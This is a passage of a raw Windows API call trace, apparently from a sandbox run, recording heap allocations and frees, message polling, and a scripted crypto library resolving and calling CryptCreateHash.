(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0248.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0248.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0248.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0248.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0248.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0248.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0248.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0248.262] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0248.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0248.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0248.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0248.262] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0248.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0248.263] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0248.263] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0248.263] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.263] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.263] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.263] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0248.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.263] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0248.263] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.263] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.263] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0248.264] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0248.264] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0248.264] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.264] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0248.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0248.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0248.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0248.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0248.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0248.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0248.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0248.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0248.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0248.305] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.306] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0248.306] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0248.306] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0248.306] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.306] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0248.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0248.307] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.307] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0248.307] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.307] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.307] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0248.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0248.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0248.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0248.307] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.308] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0248.308] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0248.308] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0248.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0248.308] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0248.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0248.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0248.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0248.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51898, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0248.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.309] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0248.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0248.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0248.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0248.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0248.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0248.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0248.309] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0248.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0248.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0248.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) 